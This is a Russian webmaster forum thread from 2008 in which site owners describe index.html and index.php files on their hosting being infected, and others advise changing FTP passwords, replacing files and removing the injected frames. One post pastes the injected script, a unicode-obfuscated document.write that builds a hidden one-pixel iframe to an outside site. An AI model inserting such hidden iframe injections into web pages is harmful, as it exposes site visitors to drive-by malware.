23.08.2008, 09:49 | #1 |
Эксперт
Регистрация: 22.08.2008
Сообщений: 1,026
Вес репутации: 233
|
Вирусы, вирусы, вирусы:(
Всем привет. Вчера столкнулся с такой ситуацией, какой то вирус заразил на хостинге (на трех сайтах) файл INDEX.html. Самое странное то что остальные страницы без вирусов а именно главная. Кто то сталкивался с такой проблемой?
|
23.08.2008, 10:12 | #3 | |
Мастер
Регистрация: 17.03.2008
Адрес: <?php
Сообщений: 734
Вес репутации: 221
|
Цитата:
2. Чуток разделом ошиблись (здесь задают вопросы по системе) |
|
23.08.2008, 10:16 | #4 |
Эксперт
Регистрация: 22.08.2008
Сообщений: 1,026
Вес репутации: 233
|
Оно заключаеться в том, что закачиваешь файл на сервер, через пару часиков заходишь в Оперу и вуаля, антивирус еаходит какую то дрянь
Вот щас думаю что делать?! Может подкажет кто то Добавлено через 1 минуту В том то и дело, что код страницы не изменяет. Последний раз редактировалось DRIVER; 23.08.2008 в 10:16. Причина: Добавлено сообщение |
23.08.2008, 10:17 | #5 |
WebDigger
Регистрация: 03.03.2008
Адрес: Ростов-на-Дону
Сообщений: 509
Вес репутации: 287
|
1. Меняем пароли доступа по ФТП
2. Меняем зараженные файлы 3. Больше НЕ ПОЛЬЗУЕМСЯ не лецинзионным Тотал/Виндоус Командером для загрузки фалов по ФТП, а скачиваем Core FTP Lite и живем счастливо.
__________________
|
23.08.2008, 10:41 | #6 |
Эксперт
Регистрация: 22.08.2008
Сообщений: 1,026
Вес репутации: 233
|
|
23.08.2008, 10:51 | #7 |
Администратор
Регистрация: 05.02.2007
Сообщений: 18,405
Вес репутации: 715
|
И где тогда вирус? В просто хтмл - вирус так видно, глазами. Чай не винда... может не на сайте вирь?
__________________
Читаем ФАК |
23.08.2008, 10:59 | #8 |
Новичок
Регистрация: 09.04.2008
Сообщений: 11
Вес репутации: 0
|
тож самое))) на всех сайтах в index.html и index.php в самом конце нашел вод такой код
script type="text/javascript"> document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068 \u0074\u0074\u0070\u003a\u002f\u002f\u0072\u0075\u 006f\u006f\u002e\u0069\u006e\u0066\u006f\u002f\u00 30\u0033\u0030\u0036\u002f\u0069\u006e\u0064\u0065 \u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u 0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u00 65\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073 \u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u 0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u00 3a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070 \u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u 0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u00 22\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d \u0065\u003e'); </script в этом скрипте решил убрать "<" и ">" а то вдруг заражу наш форум))) нашел его только вчера, на сайтах был где то с начала июня |
23.08.2008, 11:10 | #9 |
Особый статус
|
После прогонов аллсабом аналогично все файлы index.* на фтп с уровнем вложенности до 3-го, дописываются iframe'ом на сайт faina.cc вроде... Сам больше не гоняю по каталогам, пусть другие ловят зверье за 5 баксов
|
23.08.2008, 17:41 | #10 |
Специалист
|
Это фреймы удаляй и живи красиво
__________________
Обращаться на почту 1ast@bk.ru |
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Внимание! Вирусы! | Wink | Вопросы по работе системы | 233 | 05.05.2009 10:02 |
Часовой пояс GMT +3, время: 08:06.